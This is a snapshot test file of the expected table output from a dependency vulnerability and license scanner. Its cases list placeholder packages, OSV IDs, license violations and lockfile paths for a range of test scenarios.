╭───────────────────┬───────────┬───────────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼───────────────┼─────────┼────────────────────────────┤ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfile │ │ MIT │ Packagist │ author1/mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴───────────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼────────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ Apache-2.0 │ npm │ mine2 │ 3.2.5 │ path/to/my/second/lockfile │ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT, Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 
0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 
0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ 7.8 │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfile │ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfile │ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ │ MIT │ npm │ mine1 │ 1.3.5 │ path/to/my/third/lockfile │ │ Apache-2.0 │ npm │ mine1 │ 1.2.3 │ path/to/my/third/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. ╭─────────────────────────────────────────────────────────╮ │ Deprecated packages │ ├───────────┬────────────────┬─────────┬──────────────────┤ │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────┼────────────────┼─────────┼──────────────────┤ │ npm │ deprecated-pkg │ 1.0.0 │ path/to/lockfile │ ╰───────────┴────────────────┴─────────┴──────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬───────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼───────────────────────────┤ │ MIT │ npm │ mine1 │ 1.2.3 │ path/to/my/first/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ ╭───────────────────┬───────────┬─────────┬─────────┬────────────────────────────╮ │ LICENSE VIOLATION │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├───────────────────┼───────────┼─────────┼─────────┼────────────────────────────┤ │ MIT │ npm │ mine2 │ 5.9.0 │ path/to/my/second/lockfile │ ╰───────────────────┴───────────┴─────────┴─────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 (dev) │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-3 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ npm │ mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/third/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-3 │ 4.3 │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴───────────────┴────────────────────────────╯ --- 
[TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬───────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.2 │ -- │ path/to/my/first/lockfile │ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴───────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬───────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼───────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-2 │ │ NuGet │ mine2 │ 3.2.5 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author1/mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-3 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-5 │ │ Packagist │ author3/mine3 │ 0.4.1 │ -- │ path/to/my/second/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴───────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/GHSA-123 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
